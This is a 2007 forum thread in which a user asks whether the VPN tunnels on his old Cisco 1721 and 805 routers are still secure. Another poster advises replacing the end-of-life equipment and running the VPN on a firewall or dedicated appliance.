vpn tunel security
Bookmark this page:
 Yahoo!
 Google
 Windows Live
 del.icio.us
 digg
 Netscape
|
|
||||||||||||||||
|
Posted by sali on November 26, 2007, 6:29 pm
Please log in for more thread options internet since it is quite old equip, can somebody advice how secure are those tunnels going over internet today? as i understand, they depends on secret preshared key of certain bit-length with dramatical computational power rising, is there danger that somebody on the net my break the security of those vpn tunnels, either in reading the data, or even injecting something into the stream so, do i need to worry, or these routers and their vpn settings are still safe? thnx | ||||||||||||||||
|
Posted by Brian V on November 26, 2007, 6:47 pm
Please log in for more thread options The only real vunerabilty on a VPN tunnel is whats called a man in the middle attack. That would have to happen at one of the 2 physical locations or at one of the pops that that the traffic passes thru. A "user" that is simply on the internet cannot simply break in to your tunnel. There are lots of other things you should be worried about besides the tunnel. Both pieces of equipment are EOL/EOS which means they are running out dated software that most certainly has vunerabilites. I'd be more worried about that than the tunnel! | ||||||||||||||||
|
Posted by sali on November 26, 2007, 7:28 pm
Please log in for more thread options well, they were payed quite expensive, and for many years they work quite
well [we have simply star topology, with static routes, no dynamic connection comming from outside] since they are outdated eol/eos, does it mean they have to be replaced with new [also expensive] ones, or we can simply wait untile some of them experience some fatal hw shock, and be replaced then? i am in the process of interrogating my network and trying to estimate potential treats and cost analysis any experience and advice is helpfull thnx >
>> we have vpn corporate network with cisco/1721 and cisco/805 routers over
>> the internet >> since it is quite old equip, can somebody advice how secure are those >> tunnels going over internet today? >> thnx >> > Both pieces of equipment are EOL/EOS which means they are running out
> dated software that most certainly has vunerabilites. | ||||||||||||||||
|
Posted by Brian V on November 26, 2007, 10:53 pm
Please log in for more thread options
>
>>
>>> we have vpn corporate network with cisco/1721 and cisco/805 routers over
>>> the internet >>> since it is quite old equip, can somebody advice how secure are those >>> tunnels going over internet today? >>> thnx >>> >> Both pieces of equipment are EOL/EOS which means they are running out
>> dated software that most certainly has vunerabilites. >
> > well, they were payed quite expensive, and for many years they work quite
> well [we have simply star topology, with static routes, no dynamic > connection comming from outside] > > since they are outdated eol/eos, does it mean they have to be replaced > with new [also expensive] ones, or we can simply wait untile some of them > experience some fatal hw shock, and be replaced then? > > i am in the process of interrogating my network and trying to estimate > potential treats and cost analysis > > any experience and advice is helpfull > thnx Please dont top post, it makes it very difficult for people to read and respond to the threads. A simple "Star" topology would be refering to a private infrastructure, not a publically facing VPN setup. If by star you are refering to the VPN tunnels that you have then yes, without question you should be running modern updated equipment running current software. As attack signatures and vulnerabilities are introduced vendors bring out updated software to address those attacks. On your out dated equipment those vulnerabilites still exist and can be exploited. Internal routers are a different story in my opinion, those can run "older" software as they are not public facing and do not face the same exploits that edge routers face. You comment on equipment being "expensive", I beg to differ. Equipment these days is very reasonably priced. A modern 2801 router probably costs less than you paid for the 1700 series you have. What is the cost of your corporate private information, what would it cost you if your customer information was stolen? Is it worth more than the couple grand you'll pay for a new edge router? If so, then you have your answer already. In addition to that, VPN should never be run from the edge router, it should be being run from a corporate firewall or dedicated VPN appliance. Edge internet routers should be doing simple filtering, anti-spoofing, simple expoit stuff to keep the load off the firewall. A properly designed and implemented network edge may be much more reasonably priced than you think. | ||||||||||||||||
|
Posted by sali on November 27, 2007, 2:52 am
Please log in for more thread options grupi:6sednWDi-opzCdbanZ2dnUVZ_oCvnZ2d@comcast.com...
>
>>
>>>
>>>> we have vpn corporate network with cisco/1721 and cisco/805 routers >>>> over the internet >>>> since it is quite old equip, can somebody advice how secure are those >>>> tunnels going over internet today? >>>> thnx >>>> >>> Both pieces of equipment are EOL/EOS which means they are running out >>> dated software that most certainly has vunerabilites. >>
>> >
>> well, they were payed quite expensive, and for many years they work quite
>> well [we have simply star topology, with static routes, no dynamic >> connection comming from outside] >> >> since they are outdated eol/eos, does it mean they have to be replaced >> with new [also expensive] ones, or we can simply wait untile some of them >> experience some fatal hw shock, and be replaced then? >> >> i am in the process of interrogating my network and trying to estimate >> potential treats and cost analysis >> >> any experience and advice is helpfull >> thnx >
> A simple "Star" topology would be refering to a private infrastructure, > not a publically facing VPN setup. If by star you are refering to the VPN > tunnels that you have then yes, without question you should be running > modern updated equipment running current software. As attack signatures > and vulnerabilities are introduced vendors bring out updated software to > address those attacks. On your out dated equipment those vulnerabilites > still exist and can be exploited. Internal routers are a different story > in my opinion, those can run "older" software as they are not public > facing and do not face the same exploits that edge routers face. You > comment on equipment being "expensive", I beg to differ. Equipment these > days is very reasonably priced. A modern 2801 router probably costs less > than you paid for the 1700 series you have. What is the cost of your > corporate private information, what would it cost you if your customer > information was stolen? Is it worth more than the couple grand you'll pay > for a new edge router? If so, then you have your answer already. In > addition to that, VPN should never be run from the edge router, it should > be being run from a corporate firewall or dedicated VPN appliance. Edge > internet routers should be doing simple filtering, anti-spoofing, simple > expoit stuff to keep the load off the firewall. A properly designed and > implemented network edge may be much more reasonably priced than you > think. thnx for your suggestions. they can help me to present a maintenance and upgrade costs to my management [as they are allwasy "cutting" the costs]. | ||||||||||||||||
| Similar Threads | Posted |
| vpn tunel security | November 26, 2007, 6:29 pm |
| Re: IT Security news and information site for Security Professionals | August 7, 2008, 8:57 am |
| Accessing higher security level from higher security level | July 11, 2005, 3:20 pm |
| VPN Security | March 2, 2007, 8:50 am |
| ACL for Cat2950 security | February 10, 2005, 4:53 pm |
| Help on security logs | December 20, 2005, 11:22 am |
| 802.1X v/s Port Security | August 9, 2006, 12:18 am |
| Security issue within the VPN | September 20, 2006, 11:16 am |
| vlans for security | September 25, 2006, 7:19 am |
| CCIE-Security | December 14, 2007, 3:44 am |
| Cisco Security agent | July 18, 2005, 2:14 pm |
| multiple security context on ASA | October 19, 2005, 11:58 pm |
| Re: switchport port-security | November 30, 2005, 7:59 am |
| 2801 ISR Security Bundle | March 10, 2006, 5:19 pm |
| Cisco security training | March 12, 2006, 12:04 pm |
> the internet
> since it is quite old equip, can somebody advice how secure are those
> tunnels going over internet today?
>
> as i understand, they depends on secret preshared key of certain
> bit-length
> with dramatical computational power rising, is there danger that somebody
> on the net my break the security of those vpn tunnels, either in reading
> the data, or even injecting something into the stream
>
> so, do i need to worry, or these routers and their vpn settings are still
> safe?
>
> thnx
>